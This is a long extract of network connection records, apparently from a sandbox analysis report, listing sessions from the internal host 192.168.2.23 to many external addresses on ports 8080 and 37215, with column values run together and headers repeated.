                                                        28117192.168.2.234532871.38.193.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28118192.168.2.234226814.95.42.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28119192.168.2.23462742.246.68.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28120192.168.2.2350772107.2.162.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28121192.168.2.2345638206.230.224.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28122192.168.2.235054276.45.199.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28123192.168.2.234662618.17.2.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28124192.168.2.2343224161.138.174.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28125192.168.2.2339724132.70.229.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28126192.168.2.2333146194.166.131.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28127192.168.2.233825277.35.190.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28128192.168.2.234796287.156.197.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28129192.168.2.2349696221.239.244.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28130192.168.2.2345268182.17.138.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28131192.168.2.233998064.21.109.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28132192.168.2.233670442.145.74.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28133192.168.2.2359266198.10.84.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28134192.168.2.2348618206.100.106.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28135192.168.2.2336582126.129.127.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28136192.168.2.2345308121.46.101.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28137192.168.2.233319091.106.159.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28138192.168.2.235348049.246.47.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28139192.168.2.2343150166.252.183.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28140192.168.2.2334574113.169.128.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28141192.168.2.2348238166.163.227.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28142192.168.2.2334418145.56.66.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28143192.168.2.233758634.145.189.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28144192.168.2.2344228104.67.43.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28145192.168.2.2346998154.140.96.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28146192.168.2.2353354203.93.197.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28147192.168.2.233989265.127.136.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28148192.168.2.234333450.60.77.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28149192.168.2.2333858134.62.215.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28150192.168.2.235399663.68.90.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28151192.168.2.234753018.107.150.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28152192.168.2.2352162221.92.8.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28153192.168.2.2359272167.31.249.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28154192.168.2.2337046181.60.198.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28155192.168.2.233277037.19.161.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28156192.168.2.2339012165.108.148.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28157192.168.2.233922466.114.207.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28158192.168.2.2337852158.100.213.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28159192.168.2.2344436212.246.148.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28160192.168.2.2333990165.66.246.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28161192.168.2.233430894.66.123.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28162192.168.2.2349662167.71.186.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28163192.168.2.2344312180.13.233.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28164192.168.2.233813823.201.143.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28165192.168.2.2333174105.149.181.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28166192.168.2.2349052140.170.38.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28167192.168.2.234492267.121.195.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28168192.168.2.235107280.254.44.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28169192.168.2.233569684.108.208.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28170192.168.2.2341788139.157.57.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28171192.168.2.2341154202.122.197.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28172192.168.2.2357290146.1.182.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28173192.168.2.233457299.201.122.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28174192.168.2.234038618.105.57.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28175192.168.2.234788494.53.119.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28176192.168.2.23354002.13.175.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28177192.168.2.2354976117.208.251.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28178192.168.2.2347018201.99.141.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28179192.168.2.2344168133.171.69.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28180192.168.2.2347666125.116.223.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28181192.168.2.235395480.70.166.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28182192.168.2.2351320147.129.158.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28183192.168.2.2332840136.54.50.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28184192.168.2.233885486.78.131.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28185192.168.2.2355346125.54.41.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28186192.168.2.2335892103.92.54.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28187192.168.2.2350594195.176.196.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28188192.168.2.2340912200.244.81.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28189192.168.2.235149648.71.186.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28190192.168.2.235679652.159.42.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28191192.168.2.234838284.35.115.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28192192.168.2.234243245.15.79.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28193192.168.2.235869090.76.112.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28194192.168.2.2353190205.90.150.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28195192.168.2.234674624.120.132.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28196192.168.2.2339504197.140.187.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28197192.168.2.235980435.140.44.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28198192.168.2.233532652.84.56.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28199192.168.2.2356788144.57.28.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28200192.168.2.233351066.46.50.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28201192.168.2.233849290.105.199.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28202192.168.2.2359358133.154.106.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28203192.168.2.2346420197.78.32.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28204192.168.2.233956234.218.175.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28205192.168.2.23377782.70.213.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28206192.168.2.2359092105.152.218.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28207192.168.2.2335042158.116.227.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28208192.168.2.2356086148.57.5.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28209192.168.2.234903078.143.126.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28210192.168.2.233778438.182.5.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28211192.168.2.2358160165.244.175.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28212192.168.2.2336280134.101.144.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28213192.168.2.2357002112.64.177.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28214192.168.2.2337204124.41.115.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28215192.168.2.2343044109.228.12.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28216192.168.2.2338258189.83.176.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28217192.168.2.2342706139.236.108.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28218192.168.2.2355030134.32.151.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28219192.168.2.233581850.98.33.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28220192.168.2.2335130136.125.218.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28221192.168.2.2341860160.91.111.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28222192.168.2.2344452179.224.230.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28223192.168.2.233768427.159.44.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28224192.168.2.233660667.95.202.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28225192.168.2.233303637.31.241.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28226192.168.2.2335560144.118.193.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28227192.168.2.2341608194.84.117.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28228192.168.2.2334346206.45.76.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28229192.168.2.2345822208.29.141.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28230192.168.2.2356416117.6.158.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28231192.168.2.2357372118.144.56.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28232192.168.2.2351200220.249.230.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28233192.168.2.2340982101.231.47.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28234192.168.2.2350028100.154.22.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28235192.168.2.2355552196.185.50.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28236192.168.2.235591438.220.17.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28237192.168.2.234629853.42.11.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28238192.168.2.2342276167.163.131.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28239192.168.2.2345394171.78.52.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28240192.168.2.2334262181.48.96.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28241192.168.2.2347464121.15.185.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28242192.168.2.2359570116.116.27.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28243192.168.2.234128889.124.37.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28244192.168.2.235098861.19.223.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28245192.168.2.2346820104.65.224.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28246192.168.2.2345514162.91.134.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28247192.168.2.2343878153.231.35.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28248192.168.2.2357630130.47.208.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28249192.168.2.234579244.17.59.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28250192.168.2.2348274131.202.238.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28251192.168.2.2335478176.252.235.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28252192.168.2.2342716132.36.234.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28253192.168.2.2348904105.9.87.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28254192.168.2.234935632.150.43.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28255192.168.2.235179246.183.82.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28256192.168.2.2341018181.176.4.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28257192.168.2.235179450.140.175.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28258192.168.2.235302052.77.18.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28259192.168.2.234630891.225.252.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28260192.168.2.2359190112.47.233.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28261192.168.2.2358360179.189.215.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28262192.168.2.235461640.251.211.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28263192.168.2.233527051.69.135.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28264192.168.2.234513695.166.129.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28265192.168.2.233353453.39.14.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28266192.168.2.234704039.151.220.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28267192.168.2.235707836.140.212.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28268192.168.2.234958887.220.145.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28269192.168.2.2334654111.205.156.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28270192.168.2.235764080.125.195.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28271192.168.2.2348470143.59.169.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28272192.168.2.2337124128.202.228.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28273192.168.2.234184444.161.252.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28274192.168.2.235433241.60.167.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28275192.168.2.2336588180.132.174.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28276192.168.2.2354398157.20.124.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28277192.168.2.2345682114.32.88.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28278192.168.2.2349244197.228.238.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28279192.168.2.2351076197.3.53.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28280192.168.2.2354480221.51.76.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28281192.168.2.234833441.51.233.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28282192.168.2.235702841.25.185.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28283192.168.2.2333166157.107.220.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28284192.168.2.2336090197.161.35.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28285192.168.2.2338488197.117.218.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28286192.168.2.2351906157.185.151.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28287192.168.2.233801841.151.240.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28288192.168.2.2333866157.217.249.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28289192.168.2.2336474157.175.191.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28290192.168.2.2344324157.99.80.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28291192.168.2.2357358157.57.26.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28292192.168.2.233788241.123.113.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28293192.168.2.2358188197.73.254.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28294192.168.2.234535041.85.131.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28295192.168.2.2357438197.92.201.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28296192.168.2.2347058136.73.250.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28297192.168.2.2344494157.254.94.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28298192.168.2.2335438197.79.82.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28299192.168.2.236086641.196.115.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28300192.168.2.2345838205.253.177.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28301192.168.2.2335810197.18.59.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28302192.168.2.2341686197.210.159.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28303192.168.2.2339732157.78.150.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28304192.168.2.235335676.170.35.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28305192.168.2.2353842157.198.205.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28306192.168.2.234905841.83.137.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28307192.168.2.2335536212.247.44.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28308192.168.2.2341550197.218.61.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28309192.168.2.2349380197.138.146.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28310192.168.2.2354802157.93.233.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28311192.168.2.235697663.201.67.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28312192.168.2.2339196197.168.151.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28313192.168.2.2335214197.111.214.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28314192.168.2.233637684.228.174.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28315192.168.2.2339608192.42.38.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28316192.168.2.235633841.238.156.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28317192.168.2.234104841.237.139.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28318192.168.2.2350724197.135.23.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28319192.168.2.2340326157.199.45.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28320192.168.2.2359698157.161.129.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28321192.168.2.2357102157.90.162.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28322192.168.2.235194697.227.241.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28323192.168.2.2352246157.173.63.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28324192.168.2.2359422182.128.207.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28325192.168.2.2345984157.36.122.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28326192.168.2.233946041.10.162.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28327192.168.2.2348950197.191.192.23437215
